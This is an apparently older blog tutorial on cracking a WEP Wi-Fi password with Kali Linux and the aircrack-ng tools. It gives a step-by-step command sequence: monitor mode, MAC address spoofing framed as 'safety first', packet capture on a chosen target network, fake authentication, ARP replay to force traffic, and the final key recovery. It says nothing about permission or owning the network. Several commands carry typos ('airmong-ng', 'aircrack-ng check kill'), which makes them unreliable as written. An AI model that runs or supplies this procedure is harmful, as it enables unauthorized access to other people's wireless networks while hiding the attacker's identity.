How to Crack WEP WIFI Passwords using Kali Linux 2017

Cracking WEP Encrypted passwords is a child's play . We have many tutorials explaining how to crack passwords. Then why am I writing this? I am writing this as a introductory material to my next article where I explain what really happens in WEP and how Kali Linux cracks the password, each and every step in detail.

As far as this post is concerned, this is just another another post in the Internet which helps you in cracking WEP Passwords.

This is purely for Educational Purposes. I am not responsible for your actions. Keeping that in mind , let's start the game

Kali Linux works on only few wifi adapters. Assuming you are aware of those Chipsets , we will move forward. If you are not aware of that please google for it before you continue reading any further. Here is a link which might help you

Setting our Adapter in Monitor Mode

Open a terminal and type the following command and hit enter as shown in the figure below.

airmon-ng 

This shows us details about our WIFI Adapter. I am using a USB Adapter as my Dell's inbuilt adapter doesn't support.

The word highlighted in the picture is our adapter Interface Name. we need to set this interface in monitor mode to capture packets ( what is monitor mode ? Explanation in next article)

airmong-ng start wlan0 ( airmong-ng start <interfaceName> )

Notice our interface wlan0 is set in monitor mode and now its name is wlan0mon. ( notice the second last sentence in the end ). Also we need to kill few processes and their PID is displayed on the screen. We can kill each one of them individually but their is one straight way of killing all at once. Type the below command.

aircrack-ng check kill

Changing Mac Address ( Optional but safety first )

Type the below commands one by one.

ifconfig wlan0mon down ( We have to turn off our interface )
macchanger -a wlan0mon ( It will generate a random mac address )
ifconfig wlan0mon up ( We have to turn it back on )

Searching for Access Points around you

Type the following command to search for all WIFI Access points in your region

airodump-ng wlan0mon ( airodump-ng <Interface in monitor mode> )

after hitting enter you will see all the list of access points around you

Here lets select the access point which has WEP Encryption and as you see above there is only one like that and that is loadme! ( Note ENC for Encryption and ESSIS for name ).

Capturing Packets of selected access point

Now lets capture packets of the WIFI that we want to hack. Type the following command to do so.

airodump-ng --bssid 00:xx:xx:xx:xx:xx -w loadme -c 11 wlan0mon

airodump-ng --bssid <mac address of router> -w <file name to store packets > -c <channel num > <interface in monitor mode > ( you will find all these details when you search for WIFI around you ).

then you will see something like this on your screen after you hit the above command.

Now lets understand this. The first line here shows details about the router . The second line shows details about routers and connected devices to it. I highlighted a column Data here. This is most important , this is what helps us in understanding whether we have enough packets to crack the password. The column STATION in second line shows list of devices connected to the router. This devices sends packets and we capture them, these packets count is what is displayed in the Data. If you dont have any device connected, it difficult to crack.

Though their are devices connected sometimes you wont get data packets quickly. you might have to wait for sometime . but here we will not wait for force to send packets.

Forcing to send Data packets using Fake Auth

Open a new terminal and type the following command to connect to router using fakeAuth.

aireplay-ng -1 0 -a 00:xx:xx:xx:xx:xx wlan0mon ( -a <mac address of router> <interface in monitor mode> )

This means your adapter is now associated with the router ( doesn't mean you can without password, you are still not connected ). you can see the mac address of your adapter and the remaining text explains you the rest.

Go to the terminal which captures Data , now you can see in the last part of the screen under column of STATION you can see the mac address of your WIFI Adapter. Don't stop the process, let it continue.

Get packets from target router

This is the main phase , this is what boosts data packets and the terminal which is still running data capture pulls these .

Type the following command

aireplay-ng -3 -b 00:xx:xx:xx:xx:xx wlan0mon ( -b <mac address of router )

Read the text in the terminal and you will understand the process. Once this starts , go back to the terminal which captures data packets and observe the packets in the Data column, it raises exponentially.

Generally the packets count should we greater than 10000 for us to crack . Lets try this. Open a new terminal , do you remember we were capturing data packets in a file ? lets see what all files it generated . we have named our file as "loadme".

Open a new terminal and type

ls

Cracking the Password using aircrack-ng

Type the following in a new terminal

aircrack-ng loadme-01.cap ( <filename>)

Notice here it failed as we didn't get enough packets. wait for those number of data and type the same command again

There you go. that's the WEP Password

Final Steps

Hit CTRL+C in all the open terminals. Open a new terminal and type the following commands

airmong-ng stop wlan0mon ( stop monitor mode and return to normal )
service networking restart
service network-manager restart

That's it. Have a nice day